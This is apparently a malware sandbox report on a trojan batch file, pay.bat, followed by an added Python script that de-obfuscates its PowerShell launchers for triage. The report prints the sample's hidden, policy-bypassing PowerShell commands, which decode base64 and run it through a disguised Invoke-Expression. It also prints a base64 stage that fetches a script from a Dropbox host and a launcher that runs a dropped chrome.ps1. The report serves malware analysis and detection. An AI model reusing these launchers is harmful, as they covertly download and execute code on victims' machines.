                Source: powershell.exe, 00000002.00000002.1844637093.000002C3E9B32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1957253822.0000019FCAEB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB21A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=blockserver-noscript
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB21A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=blockserver-usercontent
Source: unknown; Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown; Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown; Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49734

                System Summary

Source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD9B79FAB9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD9B7A91D5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD9B7A914C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD9B79F8A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD9B7A7FD3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD9B79247B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00007FFD9B776398
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00007FFD9B7763B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00007FFD9B7720DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00007FFD9B846601
Source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal96.troj.evad.winBAT@6/14@3/3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\chrome.ps1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2696:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wb0oqvof.0lp.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pay.bat" "
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pay.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('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');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps1\"; & $abc;}"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('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');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeDJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                Data Obfuscation

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW
                Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('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');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD
                Source: unknown  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps1\"; & $abc;}"
                Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('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');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B67D2A5 pushad ; iretd 2_2_00007FFD9B67D2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B7978FD push ebx; retf 2_2_00007FFD9B79796A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B7900BD pushad ; iretd 2_2_00007FFD9B7900C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B799DB8 push E85E4F20h; ret 2_2_00007FFD9B799DF9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B79752B push ebx; iretd 2_2_00007FFD9B79756A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B869051 push ecx; ret 2_2_00007FFD9B869053
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B869F8D push ecx; ret 2_2_00007FFD9B869FB3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B868F45 push ecx; ret 2_2_00007FFD9B868F63
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B868E8E push ecx; ret 2_2_00007FFD9B868EB3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B868699 push ecx; ret 2_2_00007FFD9B86869B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B869EB8 push 00000051h; ret 2_2_00007FFD9B869FB3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B864E45 push esi; ret 2_2_00007FFD9B864FA7
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B8671CC push eax; retf 2_2_00007FFD9B8671CD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B866DCB push ecx; iretd 2_2_00007FFD9B866DCC
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B86A0E9 push 00000051h; ret 2_2_00007FFD9B86A0EB
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B868551 push ecx; ret 2_2_00007FFD9B868573
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_00007FFD9B868948 push ecx; ret 2_2_00007FFD9B86894B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 3_2_00007FFD9B777967 push ebx; retf 3_2_00007FFD9B77796A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 3_2_00007FFD9B7700BD pushad ; iretd 3_2_00007FFD9B7700C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 3_2_00007FFD9B778EE0 push FFFFFFE8h; ret 3_2_00007FFD9B778EF9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 3_2_00007FFD9B847FEE push eax; iretd 3_2_00007FFD9B847FF0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 3_2_00007FFD9B847EA3 push edx; iretd 3_2_00007FFD9B847EA4
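                The two powershell.exe command lines in this section (the cmd.exe child that base64-decodes its payload and hands it to a cmdlet name hidden behind the `-f` format operator, and the later launcher that runs the dropped chrome.ps1) can be triaged statically without a sandbox. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not the sample's own code. Its only inputs are strings copied from the report: the first launcher with the report's base64 redaction placeholder left in place, the second launcher, and the truncated base64 prefix that AMSI captured. It resolves the format-operator trick to recover the hidden cmdlet, decodes the captured prefix after repairing its padding, and flags command-line traits of the kind the Sigma hits above refer to. The indicator names and patterns are this example's own, not the Sigma rules' logic, and the `push`/`ret` "Code function" entries are address-level heuristics over the two powershell.exe processes, not decoded content, so the triage works from the command lines and the AMSI string instead.

```python
"""Static triage of the PowerShell launchers recorded in this report.

Added example for this page; it is not part of the Joe Sandbox output and
not the sample's own code. Inputs are strings copied from the report: the
cmd.exe -> powershell.exe launcher (with the report's base64 redaction left
in place), the later chrome.ps1 launcher, and the truncated base64 prefix
that AMSI captured. Indicator names and patterns below are this example's
own, not the Sigma rules' logic.
"""
import base64
import re

# Copied from the report's process-creation line. The argument to
# FromBase64String is the report's redaction placeholder, not the payload.
LAUNCHER = (
    "powershell /W 1 -ep bypass -w hidden -command "
    "$cmkGnaBV=[Convert]::FromBase64String('<redacted>');"
    "$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);"
    "&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD"
)

# Second launcher from the report, which runs the dropped chrome.ps1.
STAGE2_LAUNCHER = (
    r'PowerShell.exe -WindowStyle Hidden -nop -NonInteractive -NoProfile '
    r'-ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) '
    r'\"chrome.ps1\"; & $abc;}"'
)

# Truncated base64 exactly as AMSI logged it (Data Obfuscation section).
AMSI_PREFIX = (
    "JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAn"
    "JGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1Vcmkg"
    "Imh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW"
)

# Command-line traits worth alerting on; names and patterns are this example's.
INDICATORS = {
    "execution policy bypass": re.compile(r"-e(?:xecutionpolicy|p)?\s+bypass", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden|/W\s+1", re.I),
    "base64 decode": re.compile(r"FromBase64String", re.I),
    "format-operator cmdlet obfuscation": re.compile(r"'\{\d+\}[^']*'\s*-f\s*'"),
    "call-operator invocation": re.compile(r"&\s*[({]"),
}

FORMAT_RE = re.compile(r"'([^']*)'\s*-f\s*((?:'[^']*'\s*,?\s*)+)")


def resolve_format_operator(expr: str) -> str:
    """Rebuild a string hidden behind PowerShell's -f format operator.

    '{5}{0}{2}{1}{3}{4}{6}' -f 'oke','xp',... is the Invoke-Obfuscation
    pattern that keeps the cmdlet name out of the plain command line.
    """
    m = FORMAT_RE.search(expr)
    if not m:
        raise ValueError("no -f format expression found")
    template, args = m.group(1), re.findall(r"'([^']*)'", m.group(2))
    # {n} placeholders are positional, so substitute by index.
    return re.sub(r"\{(\d+)\}", lambda p: args[int(p.group(1))], template)


def decode_b64_prefix(blob: str) -> str:
    """Decode a truncated base64 string by repairing its padding.

    Logs cut long arguments mid-group; every complete 4-char group still
    decodes, and a trailing 2- or 3-char group yields 1 or 2 more bytes.
    """
    blob = re.sub(r"[^A-Za-z0-9+/]", "", blob)
    if len(blob) % 4 == 1:          # a lone trailing char carries no full byte
        blob = blob[:-1]
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def triage(cmdline: str) -> dict:
    """Return matched indicators and, if present, the de-obfuscated cmdlet."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    try:
        cmdlet = resolve_format_operator(cmdline)
    except ValueError:
        cmdlet = None
    return {"indicators": hits, "hidden_cmdlet": cmdlet}


def stage1_script(prefix: str = AMSI_PREFIX) -> str:
    """Recover the readable start of the stage-1 script from the AMSI prefix."""
    return decode_b64_prefix(prefix)


if __name__ == "__main__":
    for name, cmd in (("launcher", LAUNCHER), ("stage 2", STAGE2_LAUNCHER)):
        r = triage(cmd)
        print(f"{name}: cmdlet={r['hidden_cmdlet']} indicators={r['indicators']}")
    print("stage 1 script starts:", stage1_script())
```

                Run as a script it prints Invoke-Expression for the first launcher and the decoded start of the stage-1 script, which writes chrome.ps1 under %AppData% and begins a wget call to a dl.dropboxusercontent host, matching the chrome.ps1 file creation and the 162.125.69.x TLS sessions recorded above. The padding repair is the part that matters for log-derived input: AMSI cut the string mid-group, and base64.b64decode rejects it unless the missing `=` characters are restored.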

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 identical entries)
